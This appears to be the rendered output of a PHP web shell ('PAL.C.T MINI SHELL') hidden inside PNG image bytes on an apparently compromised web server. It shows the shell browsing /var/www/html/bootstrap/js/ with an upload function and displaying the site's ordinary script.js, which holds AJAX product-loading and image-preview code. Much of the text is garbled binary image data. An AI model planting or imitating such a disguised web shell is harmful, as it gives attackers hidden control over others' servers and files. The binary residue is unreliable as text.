php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/bootstrap/js/
upload
files >> //var/www/html/bootstrap/js/script.js

function load_options_registrasi(str)
 {
 if (str=="")
   {
   document.getElementById("result").innerHTML="";
   return;
   } 
 if (window.XMLHttpRequest)
   {// code for IE7+, Firefox, Chrome, Opera, Safari
   xmlhttp=new XMLHttpRequest();
   }
 else
   {// code for IE6, IE5
   xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
   }
 xmlhttp.onreadystatechange=function()
   {
   if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
     {
     document.getElementById("result").innerHTML=xmlhttp.responseText;
     }
   }
   //alert(str);
  //  alert(id_kab);
 xmlhttp.open("GET","modul/mod_produk/get_brand.php?q="+str,true);
 xmlhttp.send();
 }

 function load_options_home_produk(str, id_produk)
 {

  //alert(id_produk);

 if (str=="")
   {
   document.getElementById("result").innerHTML="";
   return;
   } 
 if (window.XMLHttpRequest)
   {// code for IE7+, Firefox, Chrome, Opera, Safari
   xmlhttp=new XMLHttpRequest();
   }
 else
   {// code for IE6, IE5
   xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
   }
 xmlhttp.onreadystatechange=function()
   {
   if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
     {
     document.getElementById("result").innerHTML=xmlhttp.responseText;
     }
   }
   //alert(str);
  //  alert(id_kab);
 xmlhttp.open("GET","modul/mod_home_produk/get_brand.php?q="+str+"&id_produk="+id_produk,true);
 xmlhttp.send();
 }

 function load_options_home_technical(str, id_produk)
 {

  //alert(str);

 if (str=="")
   {
   document.getElementById("result").innerHTML="";
   return;
   } 
 if (window.XMLHttpRequest)
   {// code for IE7+, Firefox, Chrome, Opera, Safari
   xmlhttp=new XMLHttpRequest();
   }
 else
   {// code for IE6, IE5
   xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
   }
 xmlhttp.onreadystatechange=function()
   {
   if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
     {
     document.getElementById("result2").innerHTML=xmlhttp.responseText;
     }
   }
   //alert(str);
  //  alert(id_kab);
 xmlhttp.open("GET","modul/mod_home_produk/get_technical.php?q="+str+"&id_produk="+id_produk,true);
 xmlhttp.send();
 }

 function load_options_pro_produk(str, id_produk)
 {
 if (str=="")
   {
   document.getElementById("result").innerHTML="";
   return;
   } 
 if (window.XMLHttpRequest)
   {// code for IE7+, Firefox, Chrome, Opera, Safari
   xmlhttp=new XMLHttpRequest();
   }
 else
   {// code for IE6, IE5
   xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
   }
 xmlhttp.onreadystatechange=function()
   {
   if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
     {
     document.getElementById("result").innerHTML=xmlhttp.responseText;
     }
   }
   //alert(str);
  //  alert(id_kab);
 xmlhttp.open("GET","modul/mod_pro_produk/get_brand.php?q="+str+"&id_produk="+id_produk,true);
 xmlhttp.send();
 }

 function load_options_pro_technical(str, id_produk)
 {
 if (str=="")
   {
   document.getElementById("result").innerHTML="";
   return;
   } 
 if (window.XMLHttpRequest)
   {// code for IE7+, Firefox, Chrome, Opera, Safari
   xmlhttp=new XMLHttpRequest();
   }
 else
   {// code for IE6, IE5
   xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
   }
 xmlhttp.onreadystatechange=function()
   {
   if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
     {
     document.getElementById("result2").innerHTML=xmlhttp.responseText;
     }
   }
   //alert(str);
  //  alert(id_kab);
 xmlhttp.open("GET","modul/mod_pro_produk/get_technical.php?q="+str+"&id_produk="+id_produk,true);
 xmlhttp.send();
 }



        $("#image_baru1").hide();
        
        function readURL1(input) {
            if (input.files && input.files[0]) {
                var reader = new FileReader();

                reader.onload = function (e) {
                    $('#image_lama1').hide();
                    $('#image_baru1').show();
                    $('#image_baru1').attr('src', e.target.result);
                }

                reader.readAsDataURL(input.files[0]);
            }
        }

        $("#image_baru2").hide();
        
        function readURL2(input) {
            if (input.files && input.files[0]) {
                var reader = new FileReader();

                reader.onload = function (e) {
                    $('#image_lama2').hide();
                    $('#image_baru2').show();
                    $('#image_baru2').attr('src', e.target.result);
                }

                reader.readAsDataURL(input.files[0]);
            }
        }

        $("#image_baru3").hide();
        
        function readURL3(input) {
            if (input.files && input.files[0]) {
                var reader = new FileReader();

                reader.onload = function (e) {
                    $('#image_lama3').hide();
                    $('#image_baru3').show();
                    $('#image_baru3').attr('src', e.target.result);
                }

                reader.readAsDataURL(input.files[0]);
            }
        }

        $("#image_baru4").hide();
        
        function readURL4(input) {
            if (input.files && input.files[0]) {
                var reader = new FileReader();

                reader.onload = function (e) {
                    $('#image_lama4').hide();
                    $('#image_baru4').show();
                    $('#image_baru4').attr('src', e.target.result);
                }

                reader.readAsDataURL(input.files[0]);
            }
        }

         $("#image_baru5").hide();
        
        function readURL5(input) {
            if (input.files && input.files[0]) {
                var reader = new FileReader();

                reader.onload = function (e) {
                    $('#image_lama5').hide();
                    $('#image_baru5').show();
                    $('#image_baru5').attr('src', e.target.result);
                }

                reader.readAsDataURL(input.files[0]);
            }
        }


y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`